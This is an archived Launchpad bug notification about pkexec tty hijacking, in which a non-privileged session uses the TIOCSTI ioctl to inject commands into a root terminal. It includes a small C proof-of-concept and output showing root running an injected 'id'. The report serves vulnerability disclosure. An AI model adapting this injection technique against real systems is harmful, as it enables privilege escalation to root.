desktop-packages team mailing list archive

[Federico Bento <up201407890@xxxxxxxxxxxxxxxxxxx>]

Public bug reported:

When executing a program via "pkexec --user nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation.
This issue has been fixed in "su" CVE-2005-4890 by calling setsid() and in "sudo" by using the "use_pty" flag.

$ cat test.c 
#include <sys/ioctl.h>

int main()
{
	char *cmd = "id\n";
	while(*cmd)
		ioctl(0, TIOCSTI, cmd++);
}

$ gcc test.c -o test
$ id
uid=1000(saken) gid=1000(saken) groups=1000(saken)


# pkexec --user saken ./test     ----> last command i type in
id
# id    ----> did not type this
uid=0(root) gid=0(root) groups=0(root)

** Affects: policykit-1 (Ubuntu)
     Importance: Undecided
         Status: New

-- 
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to policykit-1 in Ubuntu.
https://bugs.launchpad.net/bugs/1535768

Title:
  pkexec tty hijacking via TIOCSTI ioctl

Status in policykit-1 package in Ubuntu:
  New

Bug description:
  When executing a program via "pkexec --user nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation.
  This issue has been fixed in "su" CVE-2005-4890 by calling setsid() and in "sudo" by using the "use_pty" flag.

  $ cat test.c 
  #include <sys/ioctl.h>

  int main()
  {
  	char *cmd = "id\n";
  	while(*cmd)
  		ioctl(0, TIOCSTI, cmd++);
  }

  $ gcc test.c -o test
  $ id
  uid=1000(saken) gid=1000(saken) groups=1000(saken)

  
  # pkexec --user saken ./test     ----> last command i type in
  id
  # id    ----> did not type this
  uid=0(root) gid=0(root) groups=0(root)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/policykit-1/+bug/1535768/+subscriptions